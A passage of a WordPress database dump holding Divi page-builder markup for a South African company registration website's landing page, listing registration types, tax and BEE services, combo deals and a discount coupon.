background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" border_radii=\"on|15px|15px|15px|15px\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" hover_enabled=\"0\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_bg_enable_color=\"on\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" custom_padding=\"|||\" custom_padding__hover=\"|||\" border_radii=\"on|15px|15px|15px|15px\" background_color=\"#eb007e\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color=\"on\" button_bg_enable_color__hover=\"on\" custom_margin=\"-23px|||||\" min_height=\"28px\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" custom_padding=\"|||\" custom_padding__hover=\"|||\" border_radii=\"on|15px|15px|15px|15px\" background_color=\"#eb007e\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color=\"on\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:52:55','2019-08-08 08:52:55','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32403,3,'2019-08-08 11:16:24','2019-08-08 09:16:24','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" 